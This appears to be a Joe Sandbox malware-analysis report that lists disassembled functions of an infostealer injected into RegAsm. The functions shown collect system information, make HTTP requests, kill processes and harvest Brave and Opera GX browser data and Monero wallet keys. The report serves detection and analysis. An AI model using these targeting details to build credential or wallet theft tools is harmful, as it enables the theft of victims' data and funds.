Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 1864629043-4117839003
Opcode ID: 168a7b9c6228b9ebefea5874a2022edee1e1547a41af457ad248659c6c8d9d32
Instruction ID: 803c3528c2f6da264819a3d7c940b04ffa2433250a49f127d099ce38e6074702
Opcode Fuzzy Hash: 168a7b9c6228b9ebefea5874a2022edee1e1547a41af457ad248659c6c8d9d32
Instruction Fuzzy Hash: A8921E71805249E9CB15E7A1C952BEEBBB85F29304F6440BFB50273182DE7C6B4CCA79

Uniqueness

Uniqueness Score: -1.00%

Function 00414650 Relevance: 39.6, APIs: 11, Strings: 11, Instructions: 1136
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414861
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148F6

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00413D40: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A37
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414ACC
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C19
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CBB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DFC
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E91
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414FDE
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415073
Sleep.KERNEL32(0000EA60), ref: 00415082

Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F4E
Part of subcall function 00413EA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F8F
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

), xrefs: 0041561D
ERROR, xrefs: 00414CAA
ERROR, xrefs: 00414DEE
ERROR, xrefs: 00414FCD
ERROR, xrefs: 00414A29
ERROR, xrefs: 00414C08
ERROR, xrefs: 00414E83
ERROR, xrefs: 00414853
ERROR, xrefs: 004148E8
ERROR, xrefs: 00415065
ERROR, xrefs: 00414ABE

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: )$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-1563971337
Opcode ID: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction ID: 16c706f6c4dd8a9781f8db293bfe0d0ce14ffdf2baf3511eb8db9a0682d00a07
Opcode Fuzzy Hash: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction Fuzzy Hash: DFA26F70C01248EACB15EBB5C9567DDBBB85F19308F5440BEE90573282EF78574CCAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004074E0 Relevance: 32.1, APIs: 21, Instructions: 578
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0145F630,?,00000000,?), ref: 004100FA

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004075BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040787E
lstrcat.KERNEL32(000000FF,00000000), ref: 004079D1
lstrcat.KERNEL32(000000FF,00427AAC), ref: 004079E0
lstrcat.KERNEL32(000000FF,00000000), ref: 004079F3
lstrcat.KERNEL32(000000FF,00427AB0), ref: 00407A02
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A15
lstrcat.KERNEL32(000000FF,00427AB4), ref: 00407A24
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A37
lstrcat.KERNEL32(000000FF,00427AB8), ref: 00407A46
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A59
lstrcat.KERNEL32(000000FF,00427ABC), ref: 00407A68
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A7B
lstrcat.KERNEL32(000000FF,00427AC0), ref: 00407A8A
lstrcat.KERNEL32(000000FF,00000000), ref: 00407AD1
lstrcat.KERNEL32(000000FF,00427AC4), ref: 00407AEE
lstrlen.KERNEL32(000000FF), ref: 00407B56
lstrlen.KERNEL32(000000FF), ref: 00407B65
RtlAllocateHeap.NTDLL(00000000), ref: 00407885

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

memset.MSVCRT ref: 00407BBF
DeleteFileA.KERNEL32(00000000,?,?,?,00427A73), ref: 00407BE7

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID:
API String ID: 2944411387-0
Opcode ID: 20af6e2ebde20c0ffb83804d1d1ffadbd1ec41ee69f419b8c4d39bd494ec6aaf
Instruction ID: 3ca0864eb58e8f8aa976caedcdd73096d5702bd7c96c1b3cb961cac798526b89
Opcode Fuzzy Hash: 20af6e2ebde20c0ffb83804d1d1ffadbd1ec41ee69f419b8c4d39bd494ec6aaf
Instruction Fuzzy Hash: 99327371804149EBCB14EBA5DC55BEEBB78AF19308F14416EF90273282DF786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00412420 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00412466
lstrcpy.KERNEL32(?,00000000), ref: 004124F3
lstrcpy.KERNEL32(?,00000000), ref: 00412530
lstrcpy.KERNEL32(?,00000000), ref: 00412579
lstrcpy.KERNEL32(?,00000000), ref: 004125C2
lstrcpy.KERNEL32(?,00000000), ref: 0041260A
StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412795
strtok_s.MSVCRT ref: 00412822

Strings

false, xrefs: 004127AF
true, xrefs: 0041278F

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID: false$true
API String ID: 2610293679-2658103896
Opcode ID: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction ID: 9550d4ec349f4b6986a081b59543f2dd3f4438588e0d90f2a146262d3da5c6a3
Opcode Fuzzy Hash: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction Fuzzy Hash: 42C1F97590010ABFCF14EBA4DC91EDEB779AF04308F10815EF606A7282DE785788CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A30 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 200networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000004), ref: 00405AC0
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405B1B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B4A
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405B68
InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405BB5

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405C0B
InternetCloseHandle.WININET(00000000), ref: 00405C16
InternetCloseHandle.WININET(?), ref: 00405C20
InternetCloseHandle.WININET(00000000), ref: 00405C2A

Strings

ERROR, xrefs: 00405C7E
GET, xrefs: 00405B15
ERROR, xrefs: 00405B75

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 1851261701-2509457195
Opcode ID: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
Instruction ID: 735b7a5339effcfe679080928f79d8b6525980b66e78d205f4b2077015f7fe3f
Opcode Fuzzy Hash: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
Instruction Fuzzy Hash: 5661B171900219AFEB10DB94CC85FEFB7BDEB49704F50412AFA05B3281DB785E488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404B90 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404BEB
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404BF2
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C10
StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 00404C26
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404C51
HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00404C8B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404CB0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC2
HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404CE4
InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404D54
InternetCloseHandle.WININET(00000000), ref: 00404D85
InternetCloseHandle.WININET(00000000), ref: 00404D8F
InternetCloseHandle.WININET(?), ref: 00404D99

Strings

GET, xrefs: 00404C85

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
Instruction ID: e4d9ae68b354d6a53ac565d60b82c8593cc119c1dcfd6e68e0806bb865507591
Opcode Fuzzy Hash: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
Instruction Fuzzy Hash: 486171B5A00219ABDB20DBA4DC45FEFB7B9EB49B10F504129FA05F72C0D7789904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D607 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 365fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7
StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0145F700,?,00427C0C,?,0145F5E0,?,00427C08,00000000,?,?,?,00427BE8), ref: 0040D8F0
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040D90A
StrCmpCA.SHLWAPI(?,01461ED8), ref: 0040DADF
StrCmpCA.SHLWAPI(?,0145F700), ref: 0040DB65
StrCmpCA.SHLWAPI(00000000,0145F5E0), ref: 0040DB7F

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 0040D090: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149

FindNextFileA.KERNEL32(00000000,?), ref: 0040E128
FindClose.KERNEL32(00000000), ref: 0040E137

Strings

\BraveWallet\Preferences, xrefs: 0040D9E4
Opera GX, xrefs: 0040D6D6
Brave, xrefs: 0040D8DF
Preferences, xrefs: 0040D8FE
F, xrefs: 0040E179

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcatlstrlen$CloseCopyNext
String ID: Brave$F$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 704657350-2999302618
Opcode ID: 26299d0f3a1a31749b342d311c3fef528fe4aa723cc51249040bc28adbfb42a7
Instruction ID: a4fda989be0599bcb8e2ee1ea547159008252c3dc3d0dda2ce429139a213b2aa
Opcode Fuzzy Hash: 26299d0f3a1a31749b342d311c3fef528fe4aa723cc51249040bc28adbfb42a7
Instruction Fuzzy Hash: 6AE15270900249DADB14EBA5C955BDDBBB86F19304F5040AEF949B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401D90 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 202memorystringregistryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401DC4
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401DDA
HeapAlloc.KERNEL32(00000000), ref: 00401DE1
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,000000FF), ref: 00401DFE
RegQueryValueExA.ADVAPI32(000000FF,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401E18

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

lstrcat.KERNEL32(?,00000000), ref: 00401E30
lstrlen.KERNEL32(?), ref: 00401E3D
lstrcat.KERNEL32(?,.keys), ref: 00401E58
memset.MSVCRT ref: 00401FE0

Strings

.keys, xrefs: 00401E4C
\Monero\wallet.keys, xrefs: 00401E82
wallet_path, xrefs: 00401E12
SOFTWARE\monero-project\monero-core, xrefs: 00401DF2

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1905561306-218353709
Opcode ID: 0c252696e86d2124943117d3553765e15a66fa505ff4cc1cb518860de82bd35d
Instruction ID: b7190e78a0ece566d30ab40e821a7b759709afa39e85f3d509ad0c7fbb479532
Opcode Fuzzy Hash: 0c252696e86d2124943117d3553765e15a66fa505ff4cc1cb518860de82bd35d
Instruction Fuzzy Hash: F3817F71900249EACB14EBE5DC55BEDBBB8AF19308F54416EFA05B31C2DB781608CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB80 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040FBAB
OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FBD3
strlen.MSVCRT ref: 0040FBF4
memset.MSVCRT ref: 0040FC30
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC8B
strlen.MSVCRT ref: 0040FC98
strlen.MSVCRT ref: 0040FCDE
memset.MSVCRT ref: 0040FD2A

Strings

N0ZWFt, xrefs: 0040FCD9, 0040FCE9
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FC46, 0040FD43

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

